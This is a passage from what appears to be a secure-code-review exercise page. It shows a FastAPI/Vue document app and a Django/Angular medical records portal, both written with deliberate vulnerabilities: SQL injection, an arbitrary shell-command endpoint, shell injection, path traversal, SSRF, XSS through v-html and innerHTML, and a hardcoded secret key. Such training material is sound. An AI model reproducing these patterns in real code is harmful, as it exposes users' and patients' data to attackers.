class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchall</span><span class="p">()}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/documents/{doc_id}</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">get_document</span><span class="p">(</span><span class="n">doc_id</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">x_api_token</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Header</span><span class="p">(</span><span class="bp">None</span><span class="p">),</span> <span class="n">db</span><span class="p">:</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Connection</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">get_db</span><span class="p">)):</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, title, content, owner_id, is_public FROM documents WHERE id = </span><span class="si">{</span><span class="n">doc_id</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">doc</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">doc</span><span class="p">:</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">not found</span><span class="sh">"</span><span class="p">},</span> <span class="mi">404</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">:</span> <span class="n">doc</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">:</span> <span class="n">doc</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="sh">"</span><span class="s">content</span><span class="sh">"</span><span class="p">:</span> <span class="n">doc</span><span class="p">[</span><span class="mi">2</span><span class="p">]}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/workspaces/{workspace_id}/notify</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">notify_workspace</span><span class="p">(</span><span class="n">workspace_id</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">payload</span><span class="p">:</span> <span class="nb">dict</span><span class="p">,</span> <span class="n">db</span><span class="p">:</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Connection</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">get_db</span><span class="p">)):</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT webhook_url FROM workspaces WHERE id = </span><span class="si">{</span><span class="n">workspace_id</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">row</span><span class="p">:</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">not found</span><span class="sh">"</span><span class="p">}</span> <span class="n">webhook_url</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">async</span> <span class="k">with</span> <span class="n">httpx</span><span class="p">.</span><span class="nc">AsyncClient</span><span class="p">()</span> <span class="k">as</span> <span class="n">client</span><span class="p">:</span> <span class="k">await</span> <span class="n">client</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="n">webhook_url</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="n">payload</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">notified</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/upload</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">upload_file</span><span class="p">(</span><span class="nb">file</span><span class="p">:</span> <span class="n">UploadFile</span> <span class="o">=</span> <span class="nc">File</span><span class="p">(...),</span> <span class="n">x_api_token</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Header</span><span class="p">(</span><span class="bp">None</span><span class="p">)):</span> <span class="n">dest</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">UPLOAD_DIR</span><span class="p">,</span> <span class="nb">file</span><span class="p">.</span><span class="n">filename</span><span class="p">)</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">dest</span><span class="p">,</span> <span class="sh">"</span><span class="s">wb</span><span class="sh">"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">content</span> <span class="o">=</span> <span class="k">await</span> <span class="nb">file</span><span class="p">.</span><span class="nf">read</span><span class="p">()</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">content</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">path</span><span class="sh">"</span><span class="p">:</span> <span class="n">dest</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/admin/run</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">run_command</span><span class="p">(</span><span class="n">cmd</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">x_api_token</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Header</span><span class="p">(</span><span class="bp">None</span><span class="p">)):</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">output</span><span class="sh">"</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/auth/login</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">username</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">password</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">db</span><span class="p">:</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Connection</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">get_db</span><span class="p">)):</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, username, role, api_token FROM users WHERE username = </span><span class="sh">'</span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">'</span><span class="s"> AND password_hash = </span><span class="sh">'</span><span class="si">{</span><span class="n">password</span><span class="si">}</span><span class="sh">'"</span> <span class="p">)</span> <span class="n">user</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">user</span><span class="p">:</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">invalid credentials</span><span class="sh">"</span><span class="p">}</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">api_token</span><span class="sh">"</span><span class="p">:</span> <span class="n">user</span><span class="p">[</span><span class="mi">3</span><span class="p">],</span> <span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">:</span> <span class="n">user</span><span class="p">[</span><span class="mi">2</span><span class="p">]}</span> </code></pre> </div> <p><strong><code>pages/documents.vue</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight vue"><code><span class="nt">&lt;</span><span class="k">template</span><span class="nt">&gt;</span> <span class="nt">&lt;div&gt;</span> <span class="nt">&lt;input</span> <span class="na">v-model=</span><span class="s">"searchQuery"</span> <span class="err">@</span><span class="na">input=</span><span class="s">"search"</span> <span class="na">placeholder=</span><span class="s">"Search documents..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;div</span> <span class="na">v-html=</span><span class="s">"searchResults"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">v-for=</span><span class="s">"doc in documents"</span> <span class="na">:key=</span><span class="s">"doc.id"</span><span class="nt">&gt;</span> <span class="nt">&lt;h3&gt;</span><span class="si">{{</span> <span class="nx">doc</span><span class="p">.</span><span class="nx">title</span> <span class="si">}}</span><span class="nt">&lt;/h3&gt;</span> <span class="nt">&lt;div</span> <span class="na">v-html=</span><span class="s">"doc.content"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click=</span><span class="s">"downloadDoc(doc.id)"</span><span class="nt">&gt;</span>Download<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;div&gt;</span> <span class="nt">&lt;input</span> <span class="na">v-model=</span><span class="s">"webhookPayload"</span> <span class="na">placeholder=</span><span class="s">"Webhook payload..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;button</span> <span class="err">@</span><span class="na">click=</span><span class="s">"triggerWebhook"</span><span class="nt">&gt;</span>Send Webhook<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/</span><span class="k">template</span><span class="nt">&gt;</span> <span class="nt">&lt;</span><span class="k">script</span> <span class="na">setup</span><span class="nt">&gt;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">ref</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">vue</span><span class="dl">'</span> <span class="kd">const</span> <span class="nx">searchQuery</span> <span class="o">=</span> <span class="nf">ref</span><span class="p">(</span><span class="dl">''</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">searchResults</span> <span class="o">=</span> <span class="nf">ref</span><span class="p">(</span><span class="dl">''</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">documents</span> <span class="o">=</span> <span class="nf">ref</span><span class="p">([])</span> <span class="kd">const</span> <span class="nx">webhookPayload</span> <span class="o">=</span> <span class="nf">ref</span><span class="p">(</span><span class="dl">''</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">apiToken</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nf">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">api_token</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">search</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/documents/search?q=</span><span class="p">${</span><span class="nx">searchQuery</span><span class="p">.</span><span class="nx">value</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">html</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">res</span><span class="p">.</span><span class="nf">text</span><span class="p">()</span> <span class="nx">searchResults</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="nx">html</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">downloadDoc</span> <span class="o">=</span> <span class="p">(</span><span class="nx">id</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="s2">`/api/documents/</span><span class="p">${</span><span class="nx">id</span><span class="p">}</span><span class="s2">/download?token=</span><span class="p">${</span><span class="nx">apiToken</span><span class="p">}</span><span class="s2">`</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">triggerWebhook</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/workspaces/1/notify</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/json</span><span class="dl">'</span> <span class="p">},</span> <span class="na">body</span><span class="p">:</span> <span class="nx">webhookPayload</span><span class="p">.</span><span class="nx">value</span> <span class="p">})</span> <span class="p">}</span> <span class="nt">&lt;/</span><span class="k">script</span><span class="nt">&gt;</span> </code></pre> </div> <h2> Exercise 7 — Django + Angular (MedPortal) </h2> <p><strong>App:</strong> Medical records portal for clinic staff, doctors, and administrators</p> <p><strong><code>medportal/settings.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="sh">'</span><span class="s">medportal-django-insecure-key-xyz987</span><span class="sh">'</span> <span class="n">DEBUG</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">ALLOWED_HOSTS</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">*</span><span class="sh">'</span><span class="p">]</span> <span class="n">INSTALLED_APPS</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">'</span><span class="s">django.contrib.admin</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.auth</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.contenttypes</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.sessions</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.messages</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.staticfiles</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">portal</span><span class="sh">'</span><span class="p">,</span> <span class="p">]</span> <span class="n">MIDDLEWARE</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">'</span><span class="s">django.middleware.security.SecurityMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.sessions.middleware.SessionMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.middleware.common.CommonMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.auth.middleware.AuthenticationMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.messages.middleware.MessageMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="p">]</span> <span class="n">DATABASES</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">'</span><span class="s">default</span><span class="sh">'</span><span class="p">:</span> <span class="p">{</span> <span class="sh">'</span><span class="s">ENGINE</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">django.db.backends.sqlite3</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">NAME</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">medportal.db</span><span class="sh">'</span><span class="p">,</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><strong><code>portal/views.py</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">JsonResponse</span><span class="p">,</span> <span class="n">FileResponse</span><span class="p">,</span> <span class="n">HttpResponse</span> <span class="kn">from</span> <span class="n">django.contrib.auth</span> <span class="kn">import</span> <span class="n">authenticate</span> <span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">connection</span> <span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Patient</span><span class="p">,</span> <span class="n">LabResult</span><span class="p">,</span> <span class="n">AuditLog</span> <span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="kn">import</span> <span class="n">json</span> <span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">body</span><span class="p">)</span> <span class="n">username</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">password</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">authenticate</span><span class="p">(</span><span class="n">username</span><span class="o">=</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="n">password</span><span class="p">)</span> <span class="k">if</span> <span class="n">user</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">token</span><span class="sh">'</span><span class="p">:</span> <span class="n">user</span><span class="p">.</span><span class="n">auth_token</span><span class="p">.</span><span class="n">key</span><span class="p">,</span> <span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="p">:</span> <span class="n">user</span><span class="p">.</span><span class="n">profile</span><span class="p">.</span><span class="n">role</span><span class="p">})</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid credentials</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search_patients</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">q</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, full_name, diagnosis FROM portal_patient WHERE full_name LIKE </span><span class="sh">'</span><span class="s">%</span><span class="si">{</span><span class="n">q</span><span class="si">}</span><span class="s">%</span><span class="sh">'"</span> <span class="p">)</span> <span class="n">rows</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchall</span><span class="p">()</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">patients</span><span class="sh">'</span><span class="p">:</span> <span class="n">rows</span><span class="p">})</span> <span class="k">def</span> <span class="nf">get_patient</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">patient_id</span><span class="p">):</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT id, full_name, date_of_birth, diagnosis FROM portal_patient WHERE id = </span><span class="si">{</span><span class="n">patient_id</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">row</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not found</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">404</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sh">'</span><span class="s">name</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="sh">'</span><span class="s">dob</span><span class="sh">'</span><span class="p">:</span> <span class="nf">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="sh">'</span><span class="s">diagnosis</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]})</span> <span class="k">def</span> <span class="nf">download_lab_result</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">filename</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">file</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">filepath</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">'</span><span class="s">/var/lab_results</span><span class="sh">'</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span> <span class="k">return</span> <span class="nc">FileResponse</span><span class="p">(</span><span class="nf">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="sh">'</span><span class="s">rb</span><span class="sh">'</span><span class="p">))</span> <span class="k">def</span> <span class="nf">run_export</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">report_type</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">type</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">daily</span><span class="sh">'</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span> <span class="sa">f</span><span class="sh">'</span><span class="s">python manage.py export_report --type=</span><span class="si">{</span><span class="n">report_type</span><span class="si">}</span><span class="sh">'</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span> <span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">output</span><span class="sh">'</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">})</span> <span class="k">def</span> <span class="nf">fetch_external_guidelines</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">url</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">url</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">content</span><span class="sh">'</span><span class="p">:</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">})</span> <span class="k">def</span> <span class="nf">upload_lab_result</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="n">f</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">FILES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">file</span><span class="sh">'</span><span class="p">)</span> <span class="n">patient_id</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">patient_id</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="n">f</span><span class="p">:</span> <span class="n">dest</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="sh">'</span><span class="s">/var/lab_results</span><span class="sh">'</span><span class="p">,</span> <span class="n">f</span><span class="p">.</span><span class="n">name</span><span class="p">)</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">dest</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb+</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">dest_file</span><span class="p">:</span> <span class="k">for</span> <span class="n">chunk</span> <span class="ow">in</span> <span class="n">f</span><span class="p">.</span><span class="nf">chunks</span><span class="p">():</span> <span class="n">dest_file</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">chunk</span><span class="p">)</span> <span class="n">LabResult</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">create</span><span class="p">(</span><span class="n">patient_id</span><span class="o">=</span><span class="n">patient_id</span><span class="p">,</span> <span class="n">filename</span><span class="o">=</span><span class="n">f</span><span class="p">.</span><span class="n">name</span><span class="p">,</span> <span class="n">uploaded_by</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">user</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">status</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">uploaded</span><span class="sh">'</span><span class="p">})</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid request</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">400</span><span class="p">)</span> </code></pre> </div> <p><strong><code>src/app/patient-search.component.ts</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">Component</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@angular/core</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">HttpClient</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@angular/common/http</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">DomSanitizer</span><span class="p">,</span> <span class="nx">SafeHtml</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@angular/platform-browser</span><span class="dl">'</span><span class="p">;</span> <span class="p">@</span><span class="nd">Component</span><span class="p">({</span> <span class="na">selector</span><span class="p">:</span> <span class="dl">'</span><span class="s1">app-patient-search</span><span class="dl">'</span><span class="p">,</span> <span class="na">template</span><span class="p">:</span> <span class="s2">` &lt;div&gt; &lt;input [(ngModel)]="query" (input)="search()" placeholder="Search patients..." /&gt; &lt;div [innerHTML]="searchResults"&gt;&lt;/div&gt; &lt;div *ngFor="let p of patients"&gt; &lt;h3&gt;{{ p.name }}&lt;/h3&gt; &lt;p [innerHTML]="p.diagnosis"&gt;&lt;/p&gt; &lt;button (click)="downloadLab(p.id)"&gt;Download Lab Result&lt;/button&gt; &lt;/div&gt; &lt;div&gt; &lt;input [(ngModel)]="guidelinesUrl" placeholder="Guidelines URL..." /&gt; &lt;button (click)="fetchGuidelines()"&gt;Fetch&lt;/button&gt; &lt;div [innerHTML]="guidelinesContent"&gt;&lt;/div&gt; &lt;/div&gt; &lt;div&gt; &lt;input [(ngModel)]="exportType" placeholder="Export type..." /&gt; &lt;button (click)="runExport()"&gt;Run Export&lt;/button&gt; &lt;pre&gt;{{ exportOutput }}&lt;/pre&gt; &lt;/div&gt; &lt;/div&gt; `</span> <span class="p">})</span> <span class="k">export</span> <span class="kd">class</span> <span class="nc">PatientSearchComponent</span> <span class="p">{</span> <span class="nx">query</span> <span 